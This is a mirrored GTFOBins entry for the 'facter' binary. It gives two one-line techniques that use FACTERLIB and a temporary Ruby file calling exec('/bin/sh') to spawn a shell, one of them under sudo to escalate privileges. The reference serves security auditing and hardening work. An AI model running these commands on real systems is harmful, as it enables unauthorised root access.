1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-22 23:36:03 +02:00
GTFOBins.github.io/_gtfobins/facter.md
2020-06-10 22:56:05 +02:00

259 B

functions
shell sudo
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb FACTERLIB=$TF facter
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb sudo FACTERLIB=$TF facter